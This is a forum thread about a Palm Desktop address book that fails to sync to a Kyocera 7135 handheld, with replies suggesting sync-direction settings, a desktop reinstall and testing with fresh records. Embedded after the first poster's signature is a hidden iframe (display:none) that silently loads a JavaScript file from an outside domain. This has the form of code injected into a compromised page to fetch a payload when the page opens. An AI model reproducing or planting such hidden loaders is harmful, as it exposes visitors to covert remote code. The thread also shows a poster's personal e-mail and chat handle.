+ Reply to Thread
    Converged

Address Book won't Sync

Tried searching with no avail! My Address Book on my Palm Desktop won't update my Address Book on my 7135 after a HotSync. What am I doing wrong?

Stephen the newbie<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Check your sync settings. You might have it set for the handheld to overwrite the desktop, and seeing and you have no entries (I assume) in your handheld, nothing is synching.

Might want to try Synching the desktop to the palm.

I personally don't use the palm desktop, I use Outlook with Chapura, but I think my info might be a good place to start.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Converged
    I checked setting to make sure it was desktop to palm...still no luck.

1. Did you install the new 7135 desktop? Even though the instructions indicate that it is not necessary for current Palm users, it is for many of us.

2. If you did that already, is it only the address book that is not updating? Are todos and memos working? If they are, something screwy may have happened to the address conduit. Try reinstalling the Palm desktop or #3 below.

3. Move your desktop address book to a safe place and recreate some records. If the sync works with the test records, there is probably something screwy with the data. You might want to try using the export/import functions to get the records into the desktop (category by category) syncing in between.

HTH
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135